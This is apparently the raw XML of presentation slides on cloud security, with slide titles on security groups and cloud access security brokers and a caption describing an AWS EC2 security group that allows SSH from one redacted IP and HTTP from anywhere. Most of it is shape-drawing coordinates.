                    <a:pt x="526796" y="2298000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564105" y="2323941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602370" y="2348564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641559" y="2371837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681638" y="2393727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722574" y="2414200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764335" y="2433225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806887" y="2450767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850199" y="2466795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894236" y="2481275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938967" y="2494175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984358" y="2505462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030376" y="2515102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1076989" y="2523063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124164" y="2529312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1171867" y="2533817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1220067" y="2536543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1268730" y="2537460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317392" y="2536543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1365592" y="2533817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413295" y="2529312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460470" y="2523063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1507083" y="2515102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1553101" y="2505462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1598492" y="2494175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1643223" y="2481275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1687260" y="2466795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1730572" y="2450767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773124" y="2433225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1814885" y="2414200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855821" y="2393727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1895900" y="2371837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1935089" y="2348564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1973354" y="2323941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010663" y="2298000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2046983" y="2270774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082282" y="2242297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116525" y="2212600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149682" y="2181717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181717" y="2149682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212600" y="2116525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2242297" y="2082282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2270774" y="2046983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2298000" y="2010663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2323941" y="1973354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2348564" y="1935089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371837" y="1895900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393727" y="1855821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2414200" y="1814885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2433225" y="1773124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450767" y="1730572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2466795" y="1687260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2481275" y="1643223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2494175" y="1598492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2505462" y="1553101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2515102" y="1507083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2523063" y="1460470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2529312" y="1413295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2533817" y="1365592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536543" y="1317392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2537460" y="1268730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536543" y="1220067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2533817" y="1171867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2529312" y="1124164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2523063" y="1076989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2515102" y="1030376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2505462" y="984358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2494175" y="938967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2481275" y="894236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2466795" y="850199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450767" y="806887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2433225" y="764335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2414200" y="722574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393727" y="681638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371837" y="641559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2348564" y="602370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2323941" y="564105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2298000" y="526796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2270774" y="490476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2242297" y="455177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212600" y="420934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181717" y="387777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149682" y="355742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116525" y="324859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082282" y="295162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2046983" y="266685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010663" y="239459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1973354" y="213518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1935089" y="188895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1895900" y="165622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855821" y="143732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1814885" y="123259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773124" y="104234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1730572" y="86692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1687260" y="70664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1643223" y="56184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1598492" y="43284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1553101" y="31997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1507083" y="22357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460470" y="14396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413295" y="8147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1365592" y="3642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317392" y="916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1268730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96668" y="5143500"/>
              <a:ext cx="1182624" cy="11826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09664" y="306451"/>
            <a:ext cx="28371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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-190">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Groups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33242" y="1882292"/>
            <a:ext cx="10992485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48735" marR="5080" indent="-3836670">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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screenshot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adding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custom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security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group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when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launching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new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instance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in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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>AWS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EC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2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own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below.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39611" y="760476"/>
            <a:ext cx="4104132" cy="3657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85559" y="3217164"/>
            <a:ext cx="8229600" cy="526542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2392679" y="3217164"/>
            <a:ext cx="3647440" cy="5114925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3647440" h="5114925">
                <a:moveTo>
                  <a:pt x="3294887" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="352044" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304271" y="3213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="258453" y="12574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215009" y="27664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174356" y="48062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136916" y="73350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103108" y="103108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73350" y="136916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48062" y="174356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27664" y="215009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12574" y="258453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3213" y="304271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="352044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3213" y="4810272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12574" y="4856090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27664" y="4899534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48062" y="4940187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73350" y="4977627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103108" y="5011435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136916" y="5041193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174356" y="5066481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215009" y="5086879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="258453" y="5101969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304271" y="5111330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352044" y="5114544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3294887" y="5114544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3342660" y="5111330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3388478" y="5101969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3431922" y="5086879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3472575" y="5066481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3510015" y="5041193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543823" y="5011435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3573581" y="4977627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3598869" y="4940187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3619267" y="4899534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3634357" y="4856090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3643718" y="4810272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3646931" y="4762500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3646931" y="352044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3643718" y="304271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3634357" y="258453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3619267" y="215009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3598869" y="174356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3573581" y="136916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543823" y="103108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3510015" y="73350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3472575" y="48062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3431922" y="27664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3388478" y="12574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3342660" y="3213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3294887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701544" y="4821707"/>
            <a:ext cx="3027680" cy="19538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1270">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-105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10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-80">
                <a:solidFill>
                  <a:srgbClr val="404040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1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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>policy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45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1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2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5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dirty="0" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>H  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>acces</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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0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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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5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7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95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05">
                <a:solidFill>
                  <a:srgbClr val="404040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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>le</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>IP  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15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8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75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1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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(reda</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ct</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>acces</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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1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45">
                <a:solidFill>
                  <a:srgbClr val="404040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12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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>HT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="6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1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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>from  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>address.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66079" y="306451"/>
            <a:ext cx="532511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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brokers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59223" y="760476"/>
            <a:ext cx="7379208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715767" y="3747515"/>
            <a:ext cx="3310254" cy="2796540"/>
            <a:chOff x="2715767" y="3747515"/>
            <a:chExt cx="3310254" cy="2796540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4431029" y="4107941"/>
              <a:ext cx="988060" cy="721360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="988060" h="721360">
                  <a:moveTo>
                    <a:pt x="0" y="720852"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14719" y="693621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29722" y="665409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45176" y="636337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61249" y="606529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95925" y="545194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135089" y="482386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156774" y="450737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180084" y="419087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205188" y="387560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232252" y="356279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261444" y="325366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292933" y="294944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326886" y="265136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363470" y="236064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402854" y="207852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445205" y="180622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490691" y="154496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539479" y="129599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591737" y="106051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647633" y="83977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707335" y="63499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771010" y="44739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838826" y="27821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910950" y="12867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987552" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="7E7E7E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405627" y="3747515"/>
              <a:ext cx="620395" cy="620395"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="620395" h="620395">
                  <a:moveTo>
                    <a:pt x="516889" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103377" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63115" y="8116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30257" y="30257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8116" y="63115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="103378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="516889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8116" y="557152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30257" y="590010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63115" y="612151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103377" y="620268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516889" y="620268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557152" y="612151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590010" y="590010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612151" y="557152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620268" y="516889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620268" y="103378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612151" y="63115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590010" y="30257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557152" y="8116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516889" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="16BA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668773" y="5577077"/>
              <a:ext cx="731520" cy="2540"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="731520" h="2539">
                  <a:moveTo>
                    <a:pt x="731520" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2159"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="7E7E7E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405627" y="5259323"/>
              <a:ext cx="620395" cy="620395"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="620395" h="620395">
                  <a:moveTo>
                    <a:pt x="516889" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103377" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63115" y="8116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30257" y="30257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8116" y="63115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="103377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="516889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8116" y="557152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30257" y="590010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63115" y="612151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103377" y="620267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516889" y="620267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557152" y="612151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590010" y="590010"/>
                  </a:lnTo>
